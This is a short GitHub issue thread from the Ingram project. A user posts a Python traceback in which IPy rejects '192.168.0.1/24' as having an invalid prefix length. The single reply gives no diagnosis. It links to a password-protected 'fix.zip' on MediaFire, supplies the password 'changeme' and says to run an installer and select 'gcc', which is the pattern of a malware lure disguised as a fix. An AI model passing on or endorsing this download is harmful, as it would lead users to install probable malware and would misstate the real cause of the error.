### ISSUE TITLE
这个是什么问题啊

### ISSUE THREAD

**Issue by 634125948** [jorhelp/Ingram#93]
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python3.9/threading.py", line 973, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.9/threading.py", line 910, in run
    self._target(*self._args, **self._kwargs)
  File "/root/Ingram/Ingram/data.py", line 54, in _cal_total
    self.add_total(net.get_ip_seg_len(strip_line))
  File "/root/Ingram/Ingram/utils/net.py", line 16, in get_ip_seg_len
    return IPy.IP(ip_seg, make_net=True).len()
  File "/root/Ingram/venv/lib/python3.9/site-packages/IPy.py", line 225, in __init__
    if IP('%s/%s' % (ip, 32-netbits)).broadcast().int() != last:
  File "/root/Ingram/venv/lib/python3.9/site-packages/IPy.py", line 263, in __init__
    raise ValueError("%s has invalid prefix length (%s)" % (repr(self), self._prefixlen))
ValueError: IP('192.168.0.1/24') has invalid prefix length (24)

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
